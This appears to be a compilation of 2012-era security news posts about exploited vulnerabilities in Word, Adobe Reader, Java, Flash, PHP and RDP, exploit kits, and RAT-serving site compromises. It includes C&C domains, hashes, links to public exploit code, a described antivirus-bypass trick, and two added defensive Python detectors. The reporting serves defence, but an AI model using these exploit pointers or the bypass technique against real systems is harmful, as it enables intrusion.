Opening an email containing RTF in Outlook hands your computer to hackers

How many of you are using Microsoft Outlook in your office? Previewing or opening an email containing an RTF file in Microsoft Outlook can open a backdoor that gives remote attackers access to your machine.

Microsoft warned today that attackers are exploiting a new zero-day vulnerability in Microsoft Word that allows them to run arbitrary code on the vulnerable system.

"The vulnerability could allow remote code execution if a user opens a specially crafted RTF file using an affected version of Microsoft Word," the security advisory reads, "or previews or opens a specially crafted RTF email message in Microsoft Outlook while using Microsoft Word as the email viewer."

The vulnerability affects Microsoft Word 2003, 2007, 2010, 2013, Word Viewer and Microsoft Office for Mac 2011. The advisory states that the exploits Microsoft has seen so far have targeted Microsoft Word 2010 users.

Microsoft is in the process of creating a patch for this security flaw. In the meantime, it has released a temporary Fix it solution that prevents Microsoft Word from opening RTF files.

Other suggested mitigations are configuring Outlook to read email messages in plain text format and using the Enhanced Mitigation Experience Toolkit (EMET).

CVE-2009-0927 : PDF Exploit targets Aviation Defense Industry


Security researchers have come across a spam email that leads to a malware page delivering a PDF exploit for CVE-2009-0927. The campaign appears to target the aviation defense industry.

About CVE-2009-0927:
A stack-based buffer overflow vulnerability in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object ("Collab.getIcon()").

If the recipient opens the malicious PDF file, it shows a decoy document displaying an invitation to an actual defense industry event, while exploiting the PDF vulnerability in the background.

If the victim's machine has a vulnerable version, the shellcode inside the PDF starts to execute. The shellcode creates and runs a file named "evtmgr.exe" in the Temp folder.

The executable drops a DLL file called mssrt726.dll, which handles network communication and opens a backdoor on TCP port 49163.



CVE-2012-4681 : New zero-day Java Exploit added to Blackhole Exploit kit


As expected, cyber criminals have added the new zero-day Java exploit to the BlackHole exploit kit.

According to a post by Paunch, the BlackHole creator, the Java 0-day (CVE-2012-4681) has been available to BlackHole customers since yesterday evening.

"ATTENTION! Added 0day Java exploit to knock for new clothes, breaking is cool ... competitors - Tightens)))" he said (translated).

The exploited vulnerability exists in all versions of Java 7 and can be used to attack not just Windows but also Apple OS X and Linux systems.

As there is no patch from Oracle yet, the only way to protect yourself from this attack is to disable Java.

Update: The exploit has been included in other exploit kits, including the RedKit and Sakura kits.

[POC] Source code for the New 0-day Java Exploit is available


Security researchers from FireEye have reported that a new zero-day Java vulnerability is currently being exploited in the wild. Most recent Java Runtime Environments, i.e. JRE 1.7.x, are vulnerable.

Initially, researchers discovered this exploit hosted on a domain named ok.XXX4.net. Currently this domain resolves to an IP address in China.

A successful exploit attempt results in a dropper (Dropper.MsPMs) being installed on the infected system. The dropper executable is hosted on the same server (http://ok.XXX4.net/meeting/hi.exe).

Dropper.MsPMs connects to the C&C domain hello.icon.pk, which currently resolves to the IP address 223.25.233.244, located in Singapore.

POC:
Metasploit researchers have developed a module that exploits this latest vulnerability, and its source code is publicly available (http://pastie.org/4594319).

Researchers successfully exploited a fully patched Windows 7 SP1 system with Java 7 Update 6. They have also tested the module against the following environments:

  • Mozilla Firefox on Ubuntu Linux 10.04
  • Internet Explorer / Mozilla Firefox / Chrome on Windows XP
  • Internet Explorer / Mozilla Firefox on Windows Vista
  • Internet Explorer / Mozilla Firefox on Windows 7
  • Safari on OS X 10.7.4

While this exploit is in the wild, it is not being widely used at this time. What is more worrisome is the potential for it to be used by other malware developers in the near future. I believe that this exploit will soon be rolled into the BlackHole exploit kit.

Java users should take this problem seriously, because there is currently no patch from Oracle. We recommend that users either disable the Java plugin in their browser or uninstall Java from their computer completely.

CVE-2012-1535: Adobe Flash player being exploited in the wild


A Word document named 'iPhone 5 Battery.doc' containing a malicious embedded Flash file exploits the recently patched Adobe Flash Player vulnerability CVE-2012-1535, AlienVault researchers warn.

About CVE-2012-1535: Unspecified vulnerability in Adobe Flash Player before 11.3.300.271 on Windows and Mac OS X and before 11.2.202.238 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted SWF content.

Once the victim opens the malicious document, it exploits the vulnerability and executes the shellcode. Once the payload runs, it drops a malicious DLL file. While the malicious code executes, the malware displays a genuine article about leaked iPhone 5 battery images.

This backdoor is known as c0d0so0 (also Backdoor.Briba) and has been seen in other targeted attacks exploiting CVE-2012-0779, among others, during the past few months.

The backdoor contacts the remote server publicnews.mooo.com using an HTTP POST request and attempts to download an executable file encapsulated in a ZIP archive and disguised as a GIF.

"The use of Dynamic DNS providers like DynDNS.org, 3322.net.. is very common in this kind of threats. You should be monitoring the requests to dynamic dns providers in your network," the researchers say.

Nepalese Government Sites hacked and serves Zegost RAT

Nepalese government sites exploit a Java vulnerability and infect users' systems with Zegost malware

Researchers have detected that two Nepalese government websites, the National Information Technology Center (NITC) and the Office of the Prime Minister and Council of Ministers (nitc.gov.np and opmcm.gov.np respectively), have been compromised and serve Zegost (Gh0st RAT) malware.

The sites were injected with malicious code that tries to exploit the Java vulnerability CVE-2012-0507. After successful exploitation, it infects the visitor's system with Zegost.

Interestingly, the binary installed on infected machines as part of the attack is signed by a valid certificate issued by VeriSign.

"The main page was injected with a Java JAR file loader which once rendered by the Web browser is executed and attempts to exploit the CVE-2012-0507 vulnerability. The name used for the Java class name ("msf.x.Exploit.class") and the content of the file confirmed that the code was taken from the Metasploit framework," Gianluca Giuliani of Websense said in an analysis of the attack.

"If the exploit code in the JAR file has been successfully executed, the exploit shellcode downloads and runs the executable file named "tools.exe" on the impacted system (MD5: 3c7b7124f84cc4d29aa067eca6110e2f)."

Zegost is a known Remote Administration Tool (RAT) that has been used in other targeted attacks, specifically in Asia. Once on an infected machine, the backdoor used in the attack on the Nepalese sites initiates an outbound connection to a C&C server hosted on a domain in China, "who.xhhow4.com".


That same Java vulnerability was used in attacks earlier this year on Amnesty International and the Institute for National Security Studies in Israel, Websense said.

AV Bypass for Malicious PDFs Using XML Data Package (XDP) format

Security researcher Brandon Dixon has discovered a way to bypass antivirus detection of malicious PDFs using the XML Data Package (XDP) format.

XDP is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.

Since Adobe Reader opens XDP files just as it would a normal PDF, opening a malicious XDP file can result in exploitation of Adobe Reader.

Dixon's test document, which uses a two-year-old security vulnerability in Adobe Reader, was only detected by one anti-virus package in his tests. After experimenting with the XDP format, he was able to create another file that fooled all 42 anti-virus engines used on VirusTotal.

"The exploit is old. The JS is not encoded. This should be fixed. If you are wondering how to combat against this on your network or in your inbox, then look for XDP files," Dixon said in his blog.

"Of course, one could simply change the extension and still trick the user, but only awareness can fix that. For those with DPI, look for the Adobe XDP namespace and base64 code to identify the PDF embedded inside."
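The check Dixon describes, written out as an added example (not Dixon's code or test file): recognise the container by the Adobe XDP namespace rather than by extension, decode the base64 `<chunk>` data, and report which PDF action keys the packaged document carries. The sample XDP and the tiny PDF inside it are constructed here for the demonstration.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Namespaces Adobe uses for the XDP wrapper and for a PDF packaged inside it.
XDP_NS = "http://ns.adobe.com/xdp/"
XDP_PDF_NS = "http://ns.adobe.com/xdp/pdf/"
# PDF dictionary keys that make an embedded document worth a closer look.
SUSPICIOUS_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile")

def inspect_xdp(data: bytes) -> dict:
    """Recognise XDP by namespace (not file extension) and decode the packaged PDF."""
    result = {"is_xdp": False, "embedded_pdf": False, "pdf_size": 0, "indicators": []}
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return result  # not XML at all, so not an XDP wrapper
    if root.tag != "{%s}xdp" % XDP_NS:
        return result
    result["is_xdp"] = True
    # A packaged PDF is base64 text split across one or more <chunk> elements.
    b64 = "".join((c.text or "") for c in root.iter("{%s}chunk" % XDP_PDF_NS))
    try:
        pdf = base64.b64decode("".join(b64.split()))
    except ValueError:
        return result  # chunk present but not valid base64
    if pdf.startswith(b"%PDF"):
        result["embedded_pdf"] = True
        result["pdf_size"] = len(pdf)
        # Whole-key match so "/JS" does not also fire on longer names such as "/JSX".
        result["indicators"] = [k.decode() for k in SUSPICIOUS_KEYS
                                if re.search(re.escape(k) + rb"(?![A-Za-z])", pdf)]
    return result

# Constructed sample (not Dixon's file): a tiny PDF whose OpenAction runs JavaScript,
# wrapped in an XDP container the way Reader expects a packaged PDF.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS (app.alert(1)) >> >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
SAMPLE_XDP = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\n'
    b'<pdf xmlns="http://ns.adobe.com/xdp/pdf/"><document><chunk>\n'
    + base64.b64encode(SAMPLE_PDF) + b"\n</chunk></document></pdf>\n</xdp:xdp>\n"
)
```

Because the match is on the namespace and the decoded `%PDF` header, renaming the file to .pdf or .xml does not hide it from this check.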

PHP 5.4 Remote Exploit PoC in the wild

There is a remote exploit in the wild for PHP 5.4.3 on Windows, which takes advantage of a vulnerability in the com_print_typeinfo function. The PHP engine needs to execute the malicious code, which can include any shellcode, such as the ones that bind a shell to a port.

The exploit can be found here:
http://www.exploit-db.com/exploits/18861/

Since there is no patch available for this vulnerability yet, you might want to do the following:
  • Block any file upload function in your PHP applications to avoid the risk of exploit code execution.
  • Use your IPS to filter known shellcodes like the ones included in Metasploit.
  • Keep PHP at the current available version, so that you are not exposed to other vulnerabilities such as CVE-2012-2336, registered at the beginning of the month.
  • Use your HIPS to block any possible buffer overflow on your system.
Reference:
isc.sans.edu

The Amnesty International UK site hacked, serves Gh0st RAT

The Amnesty International UK website was compromised between May 8 and 9 and infected visitors with the infamous Gh0st RAT, Websense informs.

After analyzing the incident, Websense researchers found that the injection is similar to the one that affected the INSS site last week: the site was injected with malicious Java code. The Java file tries to exploit the well-known Java vulnerability CVE-2012-0507.

Injected malicious code

Once the exploit succeeds, it downloads an executable file "sethc.exe" and creates a new binary in the Windows system directory: C:\Program Files\... Interestingly, the executable has been signed by a "valid" certificate authority (CA).

According to the Websense researchers, this is not the first time the Amnesty International UK site has been infected with malware.

RedKit: a new private exploit kit spotted in the wild

Trustwave security researchers have spotted a new private exploit kit in the wild. The kit has no official name, so the researchers dubbed it 'RedKit' because of the red border used in the application's panel.

The developers promote the kit with a standard banner; buyers are required to share their Jabber username by filling in an online form hosted on the compromised site of an unsuspecting Christian church.

"Logging in to the admin panel presents you with options which are typically used by other exploit kits. The panel allows you to check the statistics for incoming traffic, upload a payload executable and even scan this payload with no less than 37(!) different AVs," Trustwave researchers said.

Because most security firms block each malicious URL within 24 to 48 hours, RedKit's authors have provided a new API that produces a fresh URL every hour, so customers of the kit can set up an automated process that updates their traffic sources every hour or so to point to the new URL.

The kit exploits two of the most popular vulnerabilities, but the authors will probably add more exploits soon in order to catch up with "industry leaders" such as the BlackHole and Phoenix exploit kits.

The first exploit is a fairly obfuscated PDF file that exploits the LibTIFF vulnerability (CVE-2010-0188); the second is the Java AtomicReferenceArray vulnerability (CVE-2012-0507).

The Institute for National Security Studies (Israel) website serves Poison Ivy RAT

The official website of the Institute for National Security Studies (INSS) in Israel was injected with malicious code, Websense security researchers warn.

Interestingly, the injected code tries to exploit the same Java vector (CVE-2012-0507) that infected around 600,000 Mac users in the massive attack dubbed Flashback a few weeks ago.

When a user visits the website, the injected malicious JavaScript code loads a Java exploit. The injected code shown below consists of a "document.write" function call that uses decimal-encoded string characters to hide the exploit URL. Once decoded, it redirects the user to the exploit page.
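A small static decoder for injections of the kind described above, added here as an example (the page does not reproduce the INSS code, so this is not it). It assumes the decimal encoding is the common `String.fromCharCode(...)` form and also handles `&#NNN;` HTML entities; the sample snippet and the placeholder host example.invalid are constructed.

```python
import re

# Two ways an injected script hides a string as decimal character codes.
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]+)\)")
HTML_ENTITY = re.compile(r"&#(\d+);")
URL = re.compile(r"https?://[^\s\"'<>]+")

def decode_decimal_js(snippet: str) -> str:
    """Replace String.fromCharCode(...) calls and &#NNN; entities with the text they encode.
    Only literal decimal lists are handled; arithmetic or variables inside the call are left as-is."""
    def from_codes(m):
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    decoded = FROMCHARCODE.sub(from_codes, snippet)
    return HTML_ENTITY.sub(lambda m: chr(int(m.group(1))), decoded)

def extract_urls(snippet: str) -> list:
    """URLs visible only after decoding, i.e. the ones the obfuscation was hiding."""
    return URL.findall(decode_decimal_js(snippet))

# Constructed sample, not the code from the INSS site: a document.write that emits an
# iframe pointing at a placeholder host (example.invalid).
SAMPLE = (
    "document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,"
    "58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,101,120,112,46,104,116,109,108,"
    "34,62,60,47,105,102,114,97,109,101,62));"
)
```

Running the decoder over page source pulled from a proxy or web log gives the hidden destination, which is what a blocklist or DNS check needs.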



The exploit page hosts a 'test.jar' file that exploits the well-known Java vulnerability CVE-2012-0507.

After analyzing the contents of the JAR file, researchers found that it was generated by the Metasploit toolkit and targets CVE-2012-0507. A variant of the Poison Ivy RAT is automatically installed on the victim's computer after successful Java exploitation.

Hackers developed exploit code for RDP vulnerability

Chinese hackers have released proof of concept (POC) code that tries to exploit the recently patched Windows RDP vulnerability. When Microsoft released the patch for the RDP vulnerability, it urged customers to update as soon as possible, especially since it expected an exploit to be developed within the next 30 days. But hackers took less than three days to release a working POC.

SophosLabs researchers found a Chinese website hosting exploit code written as Python scripts. The code attempts to exploit the MS12-020 RDP vulnerability and causes Windows computers to blue screen.

Even though the script only causes a blue screen of death for now, it won't take the hackers long to develop the exploit into a fast-spreading internet worm.

Researchers also came across a fake exploit for the Microsoft RDP vulnerability that claims to be the Python script of a worm. "It references a Python module that doesn't exist (FreeRDP), and claims to be written by sabu@fbi.gov, an obvious reference to the high profile Anonymous hacker who was recently revealed to have been secretly working for the FBI for months," the researcher said.